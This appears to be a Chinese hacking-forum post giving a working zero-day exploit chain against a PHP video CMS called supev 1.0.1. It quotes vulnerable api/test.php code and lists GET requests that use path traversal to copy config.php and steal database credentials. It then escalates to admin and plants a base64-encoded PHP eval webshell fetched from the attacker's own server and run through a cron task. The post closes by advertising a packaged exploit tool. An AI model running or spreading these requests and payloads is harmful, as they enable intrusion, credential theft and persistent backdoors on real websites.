- $str=file_get_contents( $thumb );
- $path = ".".getthumb_path( $vid );
- $opt_big = array(
-
- "targetfile" => $path.".jpg",
-
- "attach" => $attach['attach'],
-
- "ext" => $attach['extension'],
-
- "ratio" => false,
-
- "width" => THUMB_BIG_WIDTH,
-
- "height" => THUMB_BIG_HEIGHT
-
- );
-
- @sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] );
漏洞形成,直接以get方式请求
api/test.php?thumb=../config.php&vid=../../1 会把config.php复制到根目录下1.jpg
这样就得到了网站的配置文件,phpmyadmin连上去,如果是root连接,直接导出shell,不会的查查对应文章,这里不再叙述。
如果不是root,就注册个账号,连上去把用户的admgid改成1 在sv_members表里
接下来讲后台获取shell,
前面test.php代码file_get_contents() 可以读取远程文件写入到网站目录
api/test.php?thumb=http://你的空间地址/test.txt&vid=../../../../inc/crons/1 写到inc/crons/1.jpg
test.txt内容
<?php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?> 作用是在当前目录生成111.php 内容是LANKER的一句话,密码cmd
为什么写这里,等下就知道了,进入后台,点上方的辅助工具,新增计划任务
提交就执行了inc/crons/1.jpg内容会在根目录下生成111.php内容是LANKER的一句话,密码cmd 成功拿到shell,完了记得删除那个计划任务,不然网站就打不开了,
现在已开发出利用在这款0day的工具。
见图
supev 1.0.1 0day.rar
希望拿了这款工具的朋友到作者blog报个到
|